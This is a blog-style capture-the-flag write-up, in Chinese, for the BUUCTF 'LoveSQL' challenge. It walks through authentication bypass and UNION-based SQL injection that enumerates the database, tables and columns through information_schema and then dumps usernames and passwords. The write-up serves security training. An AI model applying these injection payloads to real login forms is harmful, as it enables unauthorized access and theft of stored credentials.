BUUCTF(八)[极客大挑战 2019]LoveSQL
2024-10-11 16:50:40
BUUCTF
1.打开题目
注入方法可参考NewsCenter
2.测试注入点
username: 1'or'1=1
password: 1'or'1=1
登录成功,说明存在注入漏洞。
下面测试位点个数。
/check.php?username=admin' order by 3%23&password=1 正常回显
/check.php?username=admin' order by 4%23&password=1 报错
%23
为“#”符号的URL编码形式
3.查库
联合查询注入
可参考NewsCenter
/check.php?username=-1'union select 1,2,database()%23&password=1
4.查表
/check.php?username=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
当前库下有两个表geekuser
l0ve1ysq1
,我们先看看l0ve1ysq1
5.查字段
/check.php?username=-1' union select 1,2, group_concat(column_name) from information_schema.columns where table_name=0x6c3076653179737131%23&password=1
注:
0x
代表16进制
6c3076653179737131
为l0ve1ysql
的16进制形式
6.查值
/check.php?username=-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
最新文章
- nth-child和:nth-of-type的区别
- Windows 8.1安装 Vmware10
- 【javaweb学习】XML和约束模式
- Invoke() 方法是 Unity3D 的一种委托机制
- mac下用ruby安装sass &;&; webstorm下给scss文件添加watch
- python基础(2)
- mvc-1mvc和类(2)
- Sklearn库例子4:分类——Lasso分类例子
- zencart安装第三步出现空白
- HDU-2262 Where is the canteen 概率DP,高斯消元
- leetcode面试准备:Implement Trie (Prefix Tree)
- AES加密跨平台出现的问题
- 为什么新建的管理员账号权限没有Administrator大?
- Stsadm 导入导出子站点
- MiniProfiler工具
- 1-安装MQTT服务器(Windows)
- node初始
- BZOJ1386 : [Baltic2000]Stickers
- Javascript学习--BOM操作
- pycharm汉化(3.6版本)